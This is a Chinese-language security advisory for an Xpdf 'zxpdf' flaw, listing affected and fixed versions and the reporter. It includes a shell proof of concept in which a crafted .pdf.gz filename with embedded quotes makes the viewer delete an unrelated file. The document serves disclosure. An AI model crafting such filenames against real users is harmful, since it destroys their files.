Xpdf ‘zxpdf’安全绕过漏洞

漏洞起因
设计错误
危险等级

 
影响系统
pdf 3.02-13
 
不受影响系统
Xpdf 3.02-19
 
危害
本地攻击者可以利用漏洞删除系统特定文件。
 
攻击所需条件
攻击者必须构建恶意文件,诱使用户解析。
 
漏洞信息
Xpdf是一款PDF文件的开放源码查看器。
使用特制的.pdf.gz文件名(可从WEB服务器发送给浏览器),可诱使xpdf删除不相关的以单字母命名的文件。
 
测试方法
$ touch y # The unrelated victim file
$ gzip -c </dev/null >’" y ".pdf.gz’ # Create a .pdf.gz file
$ xpdf ‘" y ".pdf.gz’ # View it using xpdf
Error: May not be a PDF file (continuing anyway)
Error: PDF file is damaged – attempting to reconstruct xref table…
Error: Couldn’t find trailer dictionary
Error: Couldn’t read xref table
rm: cannot remove `/tmp/’: Is a directory
$ ls -l y # The victim file is gone!
ls: cannot access y: No such file or directory
 
厂商解决方案
Xpdf 3.02-19已经修复此漏洞,建议用户下载使用:
http://www.foolabs.com/xpdf/
 
漏洞提供者
Chung-chieh Shan

发表评论?

0 条评论。

发表评论